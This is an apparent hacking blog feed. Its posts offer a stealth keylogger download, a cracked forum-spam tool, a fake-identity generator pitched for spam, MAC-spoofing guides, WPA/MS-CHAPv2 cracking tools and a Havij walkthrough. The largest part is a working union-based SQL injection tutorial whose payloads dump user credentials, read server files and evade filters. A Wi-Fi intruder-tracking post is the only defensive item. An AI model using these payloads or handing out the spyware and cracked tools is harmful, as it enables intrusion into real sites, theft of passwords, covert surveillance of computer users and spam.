tag:blogger.com,1999:blog-44255039750628650172024-03-19T03:29:59.102-07:00Hacking | Tools Hacking | Tutorial Hacking | Metasploits | Linux | Backtrack | Ubuntu | Windows 7 |Hacking | Tools Hacking | Tutorial Hacking | Metasploits | Linux | Backtrack | Ubuntu | Windows 7 | Windows 8 | Windows XpAnonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.comBlogger37125tag:blogger.com,1999:blog-4425503975062865017.post-51293287279369368152013-08-15T00:12:00.004-07:002013-08-15T00:12:41.240-07:00Award Keylogger Pro 3.0 (x86/x64) | 9.5 MB | Uploaded |<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13765506231.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13765506231.jpg" height="254" width="320" /></a></div>
<div style="text-align: center;">
Award Keylogger Pro 3.0 (x86/x64) | 9.5 MB<br />Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones.<br />Main Features:<br />• New! Run keylogger as a Windows service<br />• Easy-to-use, even for beginners<br />• Absolutely invisible/stealth mode<br />• Logs accounts and p***words typed in the every application<br />• Logs message typed in all instant messengers<br />• Visual surveillance, support screenshots view<br />• Slide show for screenshots<br />• Captures the contents behind the asterisks<br />• Captures mouse clicks<br />• Logs websites visited<br />• Captures AOL/AIM/Yahoo/ICQ chats<br />• Keyword Detection and Notification<br />• Records contents of p***word protected web pages, including Web Mail messages<br />• Logs Windows Clipboard<br />• Sends log by e-mail<br />• Uploads ALL logs into the separate folders by FTP<br />• Invisible for the firewall program<br />• Invisible in the Windows startup list<br />• Monitors all users of the PC<br />• User friendly HTML file format for emailed logs<br />• Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List<br />• Records Windows 9.x/Me/2000/XP/VISTA logon p***words<br />• Intercepts DOS-box and Java-chat keystrokes<br />• Supports international keyboards<br />• External log viewer<br />• Supports printing of the log<br />• Optimized for Windows XP<br />• Exports log to HTML</div>
<div style="text-align: center;">
<a href="http://uploaded.net/file/fr10wpst">Award Keylogger Pro 3.0.rar (9,46 MB) - uploaded.net </a></div>
<div style="text-align: center;">
<br /></div>
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-90182160392488804252013-08-15T00:07:00.002-07:002013-08-15T00:07:48.656-07:00XRumer 5.05 (Incl Crack)<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13765501621.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13765501621.png" /></a></div>
XRumer Crack is the premier automated link-building tool.<br />Through the use of this tool you will see a significant increase in the number of unique visitors to your site, as well as see your site jump in the search engine result pages. The tool is popular among both novices and gurus because of both its flexibility, power, and effectiveness. Xrumer Crack is extremely reliable and its fully automated workflow makes link-building a breeze.<br />XRumer Crack is a software application that automatically posts your messages to forums, guestbooks, bulletin boards and catalogs of the links (as well as into livejournals and wiki). In a word it is an autosubmitter.<br /><br />Below are listed main specification and features of XRumer:-<br /><br />Multithreaded submitting: over 50 simultaneously running threads possible!<br />Software can perform registration at forums (if necessary for posting messages) and automatically fill in the required fields. Upon successful registrationXRumer Crack posts the user-specified message and/or links.<br />The powerful built-in proxy-server checking script locates available proxy-servers worldwide, choosing anonymous addresses among them.Software is able to work with lots of different types of forums and guestbooks: phpBB and PHP-Nuke with any modifications, yaBB, VBulletin, Invision Power Board, IconBoard, UltimateBB, exBB, phorum.org, wiki, different types of bulletin boards and even custom-written code.<br />Attention: unique feature – software works around EVERY possible type of protection from automatic registration, including:<br />- Pictocode protection (tickets, captcha), which look something like: “Enter the number you see in the box”. Details…<br />- E-mail activation protection. Details…<br />- Java-script protection. Details…<br />During the process of posting a detailed log is created with precise path-links to posted messages so that you can check every link and every posted message afterwards.<br />A built-in proprietary “Question-answer” system.<br />A variations system, using which you can post up to 10000 messages all looking different but with similar contextual meaning and the user-defined hyperlinks in them. It helps to broaden the key queries (for Search Engine optimization) and protect your posts from being filtered out by Search Engines (that is, your posts will be included in SERPs).If the forum has more than one category, the software chooses the one most suitable for the message, otherwise it sends the message to off-top, flame sections or the like, and in case those do not exist – to the most visited category on the forum.<br />BB-code can be used.<br />The following forum base processing tools are included: repeated links deletion, hit descending sort, service denial according to customizable black list, and various filters. The program informs the users about availability of new versions and possesses many other powerful features.The system is fully user-independent and requires minimum skills to handle: you only need to choose the proper links database, create a message text with one or several hyperlinks and hit the ‘Start’ button.<a href="http://ge.tt/8iFBYMi/v/0">Direct Download</a><br />
Password:- www.warez-home.netAnonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-2654110978469307532013-08-14T23:58:00.001-07:002013-08-14T23:58:18.723-07:00fake name generator<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13765493561.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13765493561.png" height="320" width="244" /></a></div>
<div style="text-align: center;">
This is my fakenamegenerator I also added free US virtual number to send & receive SMS.So hurry up to get your free virtual number with credits too.U can use it for anything u want verifyng accounts, making surveys spam,Foolish now its more easy.Non.<a href="https://app.box.com/s/2uhfr4epwo3o5lg6j1za">Download Here</a></div>
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-91221271839939882032013-06-12T03:14:00.000-07:002013-06-12T03:14:52.725-07:00 Tutorial Frend Wi-Fi Cracker Videos<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="https://ytimg.googleusercontent.com/vi/3z24_3n-KPQ/0.jpg"><param name="movie" value="https://youtube.googleapis.com/v/3z24_3n-KPQ&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="https://youtube.googleapis.com/v/3z24_3n-KPQ&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<div style="text-align: left;">
This tutorial is for people that like to crack WEP the easy way although its not all that easy in my previous post we looked at How to Crack WiFi Network easily using Aircrack-NG for Linux OS today in this tutorial we will be cracking a WiFi network using FERN WiFi CRACKER which is a GUI (Graphical User Interface) for Aircrack-NG.<br />Before we go into this tutorial you need to first of all Click here to Download Fern WiFi Cracker After the Download is complete Open FERN WiFi CRACKER using the following commmand - See more at:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13710316251.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br /><div style="text-align: center;">
</div>
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-28181583176673322832013-06-12T02:44:00.000-07:002013-06-12T03:00:13.031-07:00CHANGE MAC ADDRESS IN BACKTRACK 4<div class="separator" style="clear: both; text-align: center;"><br />
</div><a href="http://buspic.com/img/file13710290641.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a><br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/Y5SOk9N4Pi8?feature=player_embedded' frameborder='0'></iframe></div><div style="text-align: left;"><div style="background-color: #444444; border-radius: 0em 0em 0em 1em; border: 2px solid rgb(0, 0, 0); color: white; height: auto; margin: 0px auto; overflow: hidden;">1] For changing mac address to 11:12:43:44:75:56 (let say)
2] Just type -
macchanger --mac 11:12:43:44:75:56 eth0
3] eth0 is the interface name.
Use ifconfig command to check primary interface card.
4] get back the original mac address
This spoof mac address is not permanent, original mac is restored after reboot.
Without reboot, for getting back to original mac address-
type-
macchanger -s eth0
(this will list the original mac address of eth0 interface)
macchanger --mac originalmac eth0
(it will set the original mac address)
</div></div>Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1tag:blogger.com,1999:blog-4425503975062865017.post-65637924947717169052013-06-08T23:05:00.000-07:002013-06-08T23:05:11.748-07:00SQL Injection Tutorial [Union Based]<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhPg4QAyZ4KC0XaVPFXC4YHZIee7kx0Ve5gN9Mfo6nWALdiGWknvZQbibM7MaV3PsDolAjWhE13VRdSTh1VydybjAdK8U_88MVPvu5um5brSmM-i6YXLmd8HYES19gQBkCL5OoltSz4eUw/s200/sqlinjection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhPg4QAyZ4KC0XaVPFXC4YHZIee7kx0Ve5gN9Mfo6nWALdiGWknvZQbibM7MaV3PsDolAjWhE13VRdSTh1VydybjAdK8U_88MVPvu5um5brSmM-i6YXLmd8HYES19gQBkCL5OoltSz4eUw/s200/sqlinjection.jpg" /></a></div>
Hi folks..This time I m posting a good Sql injection tutorial by End3r, which I found quite interesting to read and a Gem to share. This SQL injection tutorial will clear your most of sql injection doubts and will cleanly phase in an attack strategy for you. SQL Injection is defined by<a href="http://www.h-spot.net/threat_glossary.htm"> http://www.h-spot.net/threat_glossary.htm</a> as:<br />
<blockquote class="tr_bq">
<br />"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database." </blockquote>
Background Information<br /><br />It is considered the most common web vulnerability today<br />It's a flaw in the web application--not the db, or the server<br />Can be injected into: Cookies, Forms, and URL parameters<br /><br />Lesson Facts<br /><br />This lesson uses MySQL syntax for all examples.<br />This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them<br />This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own<br />This lesson gives small examples of filter evasion techniques<br /><br />The Lesson<br />
<br />Some commands you will need to know: <br />
<br />
<blockquote class="tr_bq">
<br />'union all select' : combines two or more select statements into one query and returns all rows<br />'order by' : used to sort rows after a select statement is executed<br />'load_file()' : loads a local file from the site or server examples would be .htaccess or /etc/passwd<br />'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file<br />'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)<br />'—' : a comment<br />'/*' : another type of comment</blockquote>
Injection SQL Queries into URL Parameters<br /><br />So you've found a site: '<br />
<blockquote class="tr_bq">
http://www.site.com/index.php?id=5'</blockquote>
and want to test if it's vulnerable to SQL Injections. Begin by checking if you can execute some of your own queries, so try: <br />
<blockquote class="tr_bq">
/index.php?id=5 and 1=0-- </blockquote>
If after executing the above statement, nothing has happened and the page has remained the same, you can try: <br />
<blockquote class="tr_bq">
/index.php?id='</blockquote>
If neither of those work, for the purposes of this tutorial move on to another site. Otherwise, if a blank page showed up you just might be in luck!<br />Now we want to find how many columns and which ones are showing when the select statement is executed so we use: <br />
<blockquote class="tr_bq">
/index.php?id=5 order by 20</blockquote>
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.<br />
<blockquote class="tr_bq">
Example:<br />/index.php?id=5 order by 15 <--returns 16="" but="" by="" error="" id="5" index.php="" no="" order="" p=""></--returns></blockquote>
returns an error, then we know that there are 15 columns in our select statement.The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from: <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--</blockquote>
The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.Now we can begin gathering information! <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15--</blockquote>
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in: <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15--</blockquote>
Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().<br />The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!<br />Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:<br />
<blockquote class="tr_bq">
/index.php?id[]= </blockquote>
You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google<br />Session Cookie Trick<br />Thanks to haZed at enigmagroup.org. In the url type: <br />
<blockquote class="tr_bq">
'java script:void(document.cookie="PHPSESSID=");'</blockquote>
This will give a session_start() error and an FPD.<br />Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have: <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--</blockquote>
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.<br />If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.<br /><br />Using information_schema.tables<br /><br />So you don't have load_file() perms? No problem, we can check for information_schema.tables.<br />1) 'table_name' is the name of a table that exists in all information_schema tables on every site: <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--</blockquote>
If the site is showing information_schema.tables, the words CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following: <br />
<blockquote class="tr_bq">
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables—</blockquote>
<br />
<blockquote class="tr_bq">
Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time </blockquote>
<blockquote class="tr_bq">
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6, 7,8,9,10,11,12,13,14,15 from information_schema.columns—</blockquote>
Selects all tables and columns that go with each table seperated by a colon <br />
2)
If none of the above queries give you anything except for
'CHARACTER_SETS' you will have to use enumeration to determine the names
of the other tables: <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--</blockquote>
Then it would show the next table in line so you would modify the above to say: <br />
<blockquote class="tr_bq">
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"-</blockquote>
Until no more tables show, then you can do the same for the columns. <br />
3)
Now after you've executed one or all of those statements, let's say you
found the table 'users' and it has the columns 'username', 'password',
'id', and 'email'. To extract that info from the table, use: <br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users---</blockquote>
And you'll get the info you requested, of course you can modify that as you like such as: <br />
<blockquote class="tr_bq">
<br />-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--<br />-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin' </blockquote>
Replacing Admin with the top user's name such as admin or owner etc..<br /><br />Final Tips<br />With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:<br />
<blockquote class="tr_bq">
<br />/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users </blockquote>
If the page shows up, you know the table exists and you can start guessing column names:<br />
<blockquote class="tr_bq">
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users</blockquote>
If you get a username, good job you guessed a correct table and column, otherwise keep guessing.<br /><br />Filter Evasion Techniques<br /><br />You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it<br />Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case<br />Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'<br />Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well<br />Be creative<br /><br />Conclusion<br />As End3r summarises it -<br />
<blockquote class="tr_bq">
“Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.<br />I'd like to thank Rebirth, killerguppy101, & Cr1t1cal for helping me get interested in and learn more about SQL Injections.<br />Thanks for reading,”</blockquote>
<blockquote class="tr_bq">
<a href="http://www.theprohack.com/2010/04/sql-injection-learn-to-attack.html" target="">Source</a><a href="http://www.theprohack.com/2010/04/sql-injection-learn-to-attack.html"> </a></blockquote>
<br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-14019460037552456942013-06-08T22:44:00.004-07:002013-06-08T22:44:54.689-07:00How to Track wi-fi Hackers<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707564621.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707563661.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707563661.jpg" /></a><a href="http://buspic.com/img/file13707564621.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi Wi-Fi Compromised / Hacked ?may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue.MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used for illegal purposes, you must consider using Moocher Hunter. Using Moocher Hunter you can identify the location of the person i.e. an unauthorized user using your wireless network. Its then upto you to either give him a stern warning of not using your wireless network again or complaining to the legal authorities.Recently Indian Police and RAW (Research and Analysis Wing) used Moocher Hunter to track the source of email which was sent from an unsecured Wi-Fi network from the home of an American expatriate,whose Network was compromised as someone wardived to use his net connection and send an email that took responsibility for a bomb blast that killed at least 42 people.MoocherHunter is FREE to use and can easily predict the physical location of the computer using the WiFi connection. <br /><div style="text-align: center;">
<a href="http://buspic.com/img/file13707564621.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707564621.gif" height="229" width="320" /></a></div>
<div style="text-align: left;">
The algorithms applied use various signal variables to accurately predict the position of the connected laptop/machine and allows to identify the location of an 802.11-based wireless moocher or hacker by the traffic they send across the network.MoocherHunter™ allows to pinpoint the location of a WIFI hacker upto an accuracy of 2 meters within an average of 30 minutes.Moocherhunter is the ultimate Wifi hacker tracker tool and its a must for every Network security specialist,White hats,Black hats,Green and Grey hats out there.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://securitystartshere.org/page-training-oswa-assistant.htm#moocherhunter"><img border="0" src="http://buspic.com/img/file13707564622.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://securitystartshere.org/page-training-oswa-assistant.htm#moocherhunter">Download MoocherHunter™ </a></div>
<div style="text-align: left;">
<br /></div>
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-50999224959662579162013-06-08T22:34:00.001-07:002013-06-08T22:34:22.528-07:00Hack Websites Using Havij [SQL Injection Tutorial]<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707554441.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707554441.jpg" /></a></div>
According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.<br /><br />One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.<br />
<blockquote class="tr_bq">
Warning - This article is only for education purposes, By reading this article you agree that Hacky Shacky is not responsible in any way for any kind of damage caused by the information provided in this article.</blockquote>
Supported Databases With Havij<br /><br />MsSQL 2000/2005 with error.<br /><br />MsSQL 2000/2005 no error union based<br /><br />MySQL union based<br /><br />MySQL Blind<br /><br />MySQL error based<br /><br />MySQL time based<br /><br />Oracle union based<br /><br />MsAccess union based<br /><br />Sybase (ASE)<br /><br /><br />Demonstration<br /><br />Now i will Show you step by step the process of SQL injection.<br /><br />Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707557091.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707557091.jpg" height="320" width="318" /></a></div>
Step3: Now click on the Analyse button as shown below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707558011.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707558011.jpg" height="243" width="320" /></a></div>
Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707558851.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707558851.jpg" height="307" width="320" /></a></div>
Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13707559691.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13707559691.jpg" height="320" width="318" /></a></div>
<br />
Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.<br /><br />Countermeasures: <br /><br />Here are some of the countermeasures you can take to reduce the risk of SQL Injection<br /><br />Renaming the admin page will make it difficult for a hacker to locate it Use a Intrusion detection system and compose the signatures for popular SQL injection strings One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form,though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.<br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-70848652541328148332013-05-31T22:05:00.003-07:002013-05-31T22:05:42.104-07:00Change mac address with macchanger Linux command In some situations you need to fake / change / spoof a MAC address of your network interface. macchanger Linux command does this job in no time. With this tool you can change your mac address of any Ethernet network device wired or wireless.<br />Here is a small example:<br /><br />My original mac address:<br />
<blockquote class="tr_bq">
<pre># ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:16:d3:23:7c:f7
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:ee000000-ee020000</pre>
</blockquote>
Turn off your network interface:<br />
<blockquote class="tr_bq">
<pre># ifconfig eth0 down</pre>
</blockquote>
Use macchanger to randomly generate new MAC address and assign it to eth0 network interface:<br />
<blockquote class="tr_bq">
<pre># macchanger -r eth0
Current MAC: 00:16:d3:23:7c:f7 (unknown)
Faked MAC: 32:cf:cb:6c:63:cd (unknown)</pre>
</blockquote>
In case you see a following error message:<br />
<blockquote class="tr_bq">
<pre>ERROR: Can't change MAC: interface up or not permission: Cannot assign requested address</pre>
</blockquote>
Make sure that your interface is down and you are running macchanger as a root user. <br /> Enable eth0 network interface and check new MAC address:<br />
<blockquote class="tr_bq">
<pre># ifconfig eth0 up
# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 32:cf:cb:6c:63:cd
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:ee000000-ee020000</pre>
</blockquote>
If for example a specific MAC address is required use macchanger as follows:<br />
<blockquote class="tr_bq">
<pre># macchanger -m b2:aa:0e:56:ed:f7 eth0
Current MAC: 32:cf:cb:6c:63:cd (unknown)
Faked MAC: b2:aa:0e:56:ed:f7 (unknown)</pre>
</blockquote>
macchanger also allows you to change mac address for a specific network
card vendor. Use a -l option to print a list of all know network card
vendors. <br />
<blockquote class="tr_bq">
</blockquote>
<blockquote class="tr_bq">
</blockquote>
<blockquote class="tr_bq">
</blockquote>
<blockquote class="tr_bq">
</blockquote>
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1tag:blogger.com,1999:blog-4425503975062865017.post-56649716405202166342013-05-31T21:59:00.001-07:002013-05-31T21:59:13.480-07:00How To Change Mac Address In BackTrack 5<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13693656841.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13693656841.jpg" height="224" width="320" /></a></div>
<blockquote class="tr_bq">
Many of them asked me thar how to change mac address in backtrack.<br /><br />It is very easy to change mac address in backtrack as we can change mac address to any in a minute by using simple commands.<br /><br />Let's start.<br />1. Open Terminal.<br />2. In terminal, type ifconfig eth0 down.<br /><br />3. The above command is used for disabling the eth0 interface.<br />4. Now change the mac address by using a simple command in backtrack.<br /><br />macchanger --mac 00:11:22:33:44:55 eth0.<br /><br />5. You change your mac address to any number by using the following command.<br />6. Now configure the eth0 by a command<br />ifcofig eth0 up<br /><br />7.Thats is you have changed mac address.</blockquote>
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1tag:blogger.com,1999:blog-4425503975062865017.post-8807596756006124482013-05-12T03:46:00.000-07:002013-05-12T03:46:11.891-07:00Chapcrack: A tool for cracking MS-CHAPv2 network handshakes Chapcrack is a tool for parsing and decrypting MS-CHAPv2 network handshakes. In order to use it, a packet with an MS-CHAPv2 network handshake must be obtained. The tool is used to parse relevant credentials from the handshake. In other words, Chapcrack parses the credential information out of MS-CHAPv2 handshakes, sends to Cloudcracker which in turn will return a packet that can be decrypted by Chapcrack to recover the password.<br /><br />The resulting file (“token”) is then submitted to CloudCracker, an online<span style="color: #38761d;"> password cracking</span> service for penetration testers and network auditors, which returns the cracked MD4 hash in under a day. For each handshake, it outputs the username, known plaintext, two known ciphertexts, and will crack the third DES key. Whats interesting to know is that Cloudcracker forwards your handshake information to a Pico Computing’s DES cracking box, which is powered by a FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second!<br /><br />The hash is inserted into chapcrack, and the entire network capture is decrypted. Alternatively, it can be used to login to the user’s VPN service or WPA2 Enterprise radius server. All of this is possible only because of the weak protocol architecture that allows MD4 hash of the user’s password to be authenticated as them, as well as to decrypt any of their traffic.<br /><br />How to use chapcrack?<br /><br />Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance).<br />Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap).<br />Submit the CloudCracker token to www.cloudcracker.com<br />
Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n ).<a href="https://github.com/moxie0/chapcrack">Download Here MS-CHAPv2</a><br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-4851963223205533632013-05-12T03:37:00.000-07:002013-05-12T03:37:54.792-07:00Web Vulnerability]cross site scripting part 1 <div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/TGtZnce-QB4?feature=player_embedded' frameborder='0'></iframe></div>
